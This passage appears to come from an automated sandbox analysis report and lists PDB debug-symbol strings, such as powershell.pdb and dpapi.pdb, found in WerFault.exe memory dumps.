          Source: Binary string: mscorlib.pdb source: WER4735.tmp.dmp.13.dr
          Source: Binary string: mscorlib.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbf source: WER4735.tmp.dmp.13.dr
          Source: Binary string: System.Management.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000D.00000003.739523880.0000000005284000.00000004.00000001.sdmp
          Source: Binary string: combase.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
          Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER4735.tmp.dmp.13.dr
          Source: Binary string: dpapi.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: secur32.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: powershell.pdb source: WerFault.exe, 0000000D.00000003.741455991.0000000005270000.00000004.00000040.sdmp
          Source: Binary string: winhttp.pdbo source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: version.pdb/ source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: System.Xml.ni.pdbRSDS source: WER4735.tmp.dmp.13.dr
          Source: Binary string: System.Numerics.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: t.PowerShell.ConsoleHost.pdb" source: WerFault.exe, 0000000D.00000003.738761846.00000000052A6000.00000004.00000001.sdmp
          Source: Binary string: wininet.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.0